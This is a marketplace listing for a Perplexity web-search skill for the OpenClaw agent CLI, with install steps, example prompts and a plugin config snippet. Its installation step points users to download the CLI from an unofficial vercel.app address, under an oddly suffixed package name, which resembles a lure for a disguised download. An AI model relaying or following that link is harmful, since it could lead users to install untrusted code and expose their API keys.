perplexity
Search the web with AI-powered answers via Perplexity API. Returns grounded responses with citations. Supports batch queries.
Why use this skill?
Integrate Perplexity AI search into your OpenClaw workflow. Get grounded, cited answers and perform batch searches directly from your terminal.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/thiagoruss0/perplexityt9dWhat This Skill Does
The Perplexity skill for OpenClaw integrates the powerful Perplexity AI search engine directly into your command-line workflow. This tool allows users to perform real-time, AI-powered web searches that provide grounded, conversational answers complete with verifiable citations. Unlike traditional search engines, the Perplexity skill parses current web data to offer synthesized insights, making it an essential utility for research-heavy tasks. It also features robust support for batch queries, allowing users to process multiple search topics in a single request efficiently.
Installation
To utilize this skill, ensure you have the OpenClawCLI installed by downloading it from https://openclawcli.vercel.app/. Once the CLI is ready, navigate to your OpenClaw environment and execute: clawhub install openclaw/skills/skills/thiagoruss0/perplexityt9d. After installation, you must configure your environment by setting the PERPLEXITY_API_KEY variable, which grants the agent authorization to interact with the Perplexity API endpoints. Without this key, the skill will remain non-functional.
Use Cases
This skill is perfect for developers and researchers who need quick access to high-quality information without switching contexts to a browser. It is ideal for summarizing current technical documentation, performing market research, gathering up-to-date news on rapid industry shifts, or validating facts while working within the terminal. Because it supports batch queries, it is also highly effective for developers performing parallel investigations into multiple technologies or competing software solutions simultaneously.
Example Prompts
- "Search for the latest security vulnerabilities in the Node.js runtime environment released this week."
- "Perform a batch search on the differences between Python's asyncio and multi-threading for I/O bound tasks, and summarize the pros of each."
- "Explain the current status of the RISC-V architecture adoption in mobile hardware and provide links to recent industry benchmarks."
Tips & Limitations
To maximize the utility of the Perplexity skill, use the --json flag when you need to pipe the output into other CLI tools for further data processing. Remember that because this skill fetches live data, response times depend on network latency and the complexity of your query. Always ensure your environment variable is set securely. Note that the skill relies on an external API; therefore, it requires an active internet connection at all times to function. Avoid using it for sensitive or private data queries, as the requests are processed by an external search infrastructure.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-thiagoruss0-perplexityt9d": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api
Related Skills
n8n
Manage n8n workflows and automations via API. Use when working with n8n workflows, executions, or automation tasks - listing workflows, activating/deactivating, checking execution status, manually triggering workflows, or debugging automation issues.
Read WeChat local data from SQLite databases. Supports listing contacts, chat sessions, searching messages, and viewing favorites. Use when the user needs to access their own WeChat data stored locally. Requires access to WeChat data directory. Read-only operations only.
coding-agent
Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.
veo3-gen
Generate and stitch short videos via Google Veo 3.x using the Gemini API (google-genai). Use when you need to create video clips from prompts (ads, UGC-style clips, product demos) and want a reproducible CLI workflow (generate, poll, download MP4, optionally stitch multiple segments).
jira
Jira API integration with managed OAuth. Search issues with JQL, create and update issues, manage projects and transitions. Use this skill when users want to interact with Jira issues, projects, or workflows. For other third party apps, use the api-gateway skill (https://clawhub.ai/byungkyu/api-gateway).